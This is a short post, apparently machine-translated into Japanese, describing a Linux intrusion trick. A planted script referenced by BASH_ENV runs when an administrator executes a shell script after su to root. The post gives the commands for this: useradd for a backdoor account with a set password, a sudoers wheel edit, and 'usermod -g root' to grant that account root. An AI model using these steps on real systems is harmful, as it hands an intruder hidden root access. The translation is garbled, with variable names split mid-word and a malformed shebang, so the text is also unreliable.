linux浸透の奇技淫巧

linux浸透の奇技淫巧

Linuxにユーザーを追加するテクニックをネット上でgetし、環境変数でスクリプトを実行し、ユーザーを追加する目的を達成しました.提権とは言えないので、記録しておくと、後で役に立つかもしれません.通常、Linuxはbashスクリプトを実行するときにBASH_ENVが設定されるとBASH_が実行されますENVが指すスクリプト.まず一例を見てみましょう
ステップ1:testを作成します.shスクリプト

!#/bin/bash
echo "test"

ステップ2:/tmp/ディレクトリの下に1つを確立する.bashrc

!#/bin/bash
echo "bashrc"

ステップ3:環境変数$BASH_の設定ENV

echo $BASH_ENV
export BASH_ENV="/tmp/.bashrc"

ステップ4:スクリプト権限の設定、スクリプトの実行、出力の表示

chmod 775 test.sh
./test.sh
     
bashrc
test

環境変数BASH_が設定されている場合ENVは、ユーザがshスクリプトを実行するとBASH_を実行するENVが指すスクリプト.では、どのように利用すればいいのでしょうか.
Linuxの低権限ユーザーを取得すると、ホストが常にsuでrootにログインしているかどうかを確認できます.このような場合、そうすればいいのですが......(下を見て)まずsu後の環境変数がいないかを見て、自分のマシンでチェックして、su後$BASH_ENVはまだ存在するので、それはやりやすいです.今/tmp/.bashrcに次のように書き込む

useradd -p `openssl passwd -l -salt '123' test1234` test

ホストユーザはsuを利用してrootユーザにログイン後、実行する.shスクリプトは、上記のコマンドを先に実行し、ユーザーの追加に成功します.cat/etc/passwdで結果を見るには注意が必要です:1.test.shの権限設定が間違っていない.ここでrootグループに直接参加することはできません.shスクリプトに機能を書き、/etc/sudoersファイルの修正を実現します.次の行を見つけて、前のコメント(#)を削除します.

## Allows people in group wheel to run all commands
%wheel    ALL=(ALL)    ALL

そしてコマンドを再実行

usermod -g root test

これによりroot権限を持つユーザーを追加できます.
一般ユーザーにroot権限を与えるにはどうすればいいですか?ステップを移動してください